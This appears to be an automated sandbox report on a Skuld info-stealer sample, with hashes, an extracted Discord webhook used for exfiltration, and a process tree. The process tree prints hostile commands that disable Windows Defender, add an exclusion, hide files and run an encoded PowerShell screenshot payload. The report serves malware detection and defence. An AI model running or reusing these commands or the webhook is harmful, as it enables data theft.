Analysis
-
max time kernel
150s -
max time network
137s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
17-10-2024 02:21
General
-
Target
skuld.exe
-
Size
9.8MB
-
MD5
6bcff50ee935d50c86234e4ead479e55
-
SHA1
e777528a010585c232bb46f16c88cc9acae9220e
-
SHA256
730ba784ff107f62110aaf728394377bf0ff607ac362ff1a32a3365b943a9ce6
-
SHA512
654b0be7a93d0517351782f225d3c83664672a33851960907ecc84b89b095bc8b7e2d44e4732c09a77ce6281275dde5723fa43e641909a418706f0d5c870af5c
-
SSDEEP
98304:G4bwKrv8PbnZEFUSpARbdUyl9nFwCg8O8rEqG5BJZrZ6Tc0xHaA:G4bv8PdfssdUylxFwCg8O84fAc0xHf
Malware Config
Extracted
skuld
https://discord.com/api/webhooks/1296277918661738547/GvUWEusnErfhpdvz7DEgE8VzXSZ8oWS_ujEIVSB0XhETe5iWx3tB8zm_wjAS1bJTlXLF
Signatures
-
Skuld stealer
An info stealer written in Go lang.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Drops file in Drivers directory 3 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 22 IoCs
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\skuld.exe"C:\Users\Admin\AppData\Local\Temp\skuld.exe"1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\skuld.exe2⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\skuld.exe2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get Name2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe2⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\smylgnlb\smylgnlb.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E67.tmp" "c:\Users\Admin\AppData\Local\Temp\smylgnlb\CSC657B3035E7364648A8AF35FB72231A3.TMP"4⤵
-
-
-
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
1KB
MD5b2083fa377d785be1b53ee6161eb3f25
SHA154a6ca6b88671611543b56a0d0af867dcb5f570e
SHA256e0ed4e293682ba2720be0a44aba04a0afcbce424bdea807ebcb5f72875d94f12
SHA512bbec0e615050bfe22f20f74cf43950bc139a83a6b5d05b2c00d941094218c10ca01c57853348b205b0fba7c08dd83095c262b5795f78499b7ccdb8c5cf17c57f
-
Filesize
1KB
MD5c2e6c6a0c5a5c311debd8c49dd77a0e9
SHA1aa5b324cae49ea40a6296400be0be907e3401c7e
SHA256335c450a134b1f79bb569de5f6230852276f50e9dbe51ef0d958c9f95024da08
SHA51258842e97fb99c691aa014163c62ae47a4dbef01b40fe532fdc06c6f9978fd151a04f95f0f1e642a750bc4d1dc69a636bc49eb8c59ab7a1c9a97007df2faf632f
-
Filesize
1KB
MD5ec0c998b010ed7da04ec7304e96228c7
SHA14c4d65b7cae0e965da9997971861222232f781cd
SHA25694f3c1ea2059d99b118cb4740c8e9bed16bc99c41a1b3c391f2f7ab3202f81ea
SHA512b144a544be513225f41c2828c468433db0ae0ce0a7e13454103f322bb113602d83de638ea07183e23368bf42a64e1934aba826461aba333a85ba7fa9ee3fb0ac
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
405KB
MD57e88f2bf81124974ee0310f766d7c3b1
SHA1c6ac39e10c4de2b13ad2a0a96bbfbc6eb5032ceb
SHA256d745c7126df5f1c8a13324a55d7c2f008546ece82c8d093ba869f04f6afe39b3
SHA512291ff2c0498c62f9fe0d19cbca8c7ffaa1d1575b5df436e48824cc2a524eef85404f5e81dfb85fd91091860fbc42c25b9d83d39f90cbea5a8a8f101b58b10b44
-
Filesize
4KB
MD5e7b06ee81811b49ca8a22d90bcdee3a2
SHA1ecb55b325d590e7006b3748536a1a9e19480444e
SHA2568f239a127fe953e20e5aa4088ca33283d6b680c1659f6b6120d877b73b38667d
SHA5120131df5bfb272a7458d128ed9ece7c18844f19276565cda4f5cdcdcb3747bb304a53f16cc6b6f0fb92738667230ffba1fc8a28b846e80ce9f09dcdcd40b17f78
-
Filesize
9.8MB
MD56bcff50ee935d50c86234e4ead479e55
SHA1e777528a010585c232bb46f16c88cc9acae9220e
SHA256730ba784ff107f62110aaf728394377bf0ff607ac362ff1a32a3365b943a9ce6
SHA512654b0be7a93d0517351782f225d3c83664672a33851960907ecc84b89b095bc8b7e2d44e4732c09a77ce6281275dde5723fa43e641909a418706f0d5c870af5c
-
Filesize
2KB
MD529637f421cb5eb9a9008b5b091823270
SHA18bb0b01ef0035a029c4ba8f6814db41fba1e716a
SHA256d3925354d35ce50360d165ece7ab2d44ee49a7aaac7f297ad8f2192249432a46
SHA51208a1efeaf082525439af8abfb117d3473ab23da5a4db276bdb49eb4a62db8ae2e14e6333c897753a22855a3c45beb413c3eafc98c2a46142c75297ce4d563665
-
Filesize
652B
MD51e25239f3a93652aa38e4a8891ecebd2
SHA17dda5c2ab424227b7fa0d836604e3bf8b08ecadd
SHA256192470e378cf94d67a5dbc03132b0a12866419316bcd3d456f18915130dd26e6
SHA512d12378b5b8951bdcb069512c712f14351e5adcc5c4b248ac0d0768a126ecccd441514fa18f3cc0c3c5f763cc147d10923f1dbd091537901f3ed9fc8a397ef2c9
-
Filesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
Filesize
607B
MD50b17852e637407aaff40d088297b8150
SHA1def52c9e1a728b3e28aeeb061aa812f8b00238b0
SHA256d36d712f66bb617998c4e148c6debe9134e9240fad23178ff574b21b18000bc3
SHA512b54281289d4f239dd4ef70f95f2d48bef066a46eb185b9d7cf6362f654b38752255e281665d14d71670f2875a055b1191cc84fbb55290dee463a681bca2e54f3
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
472KB
-
Filesize
9.9MB
-
Filesize
136KB
-
Filesize
32KB
